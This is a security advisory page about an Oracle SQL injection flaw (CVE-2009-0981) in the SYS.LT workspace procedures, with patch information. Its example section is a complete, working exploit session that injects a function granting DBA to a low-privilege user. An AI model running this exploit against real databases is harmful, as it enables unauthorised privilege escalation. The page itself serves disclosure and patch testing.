Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

Name Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
Systems Affected Oracle Database Server versions 9iR2, 10gR1, 10gR2 and 11gR1
Severity High Risk
Category Escalate User Privileges
Vendor URL http://www.oracle.com/
Credit Esteban Martinez Fayo
Exploit http://www.milw0rm.com
Date 06 Jan 2009

Details

The COMPRESSWORKSPACETREE procedure is owned by SYS or by WMSYS (depending on the Oracle version), one user can call this procedure with malicious code and execute
PL/SQL statements and elevate the privileges as the user were the package owner.

Example
Example written from Alexandr "Sh2kerr" Polyakov
SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN CONNECT NO YES NO
OUTLN RESOURCE NO YES NO

SQL> CREATE OR REPLACE FUNCTION X return varchar2
2 authid current_user as
3 pragma autonomous_transaction;
4 BEGIN
5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN';
6 COMMIT;
7 RETURN 'x';
8 END;
9 /

Function created.



SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x')

PL/SQL procedure successfully completed.

SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x')

PL/SQL procedure successfully completed.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
OUTLN CONNECT NO YES NO
OUTLN DBA NO YES NO
OUTLN RESOURCE NO YES NO



Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009 )


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published



2009 by Red-Database-Security GmbH - last update 19-jun-2009

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.